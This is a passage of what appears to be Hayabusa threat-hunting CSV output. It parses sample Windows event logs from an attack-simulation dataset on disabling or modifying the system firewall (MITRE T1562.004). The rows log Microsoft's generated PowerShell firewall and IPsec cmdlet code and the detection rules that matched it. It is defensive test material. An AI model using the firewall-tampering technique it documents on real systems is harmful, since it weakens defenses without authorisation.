($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.865 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.867 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.868 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.869 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.870 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.870 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.871 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.872 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.873 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 
'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 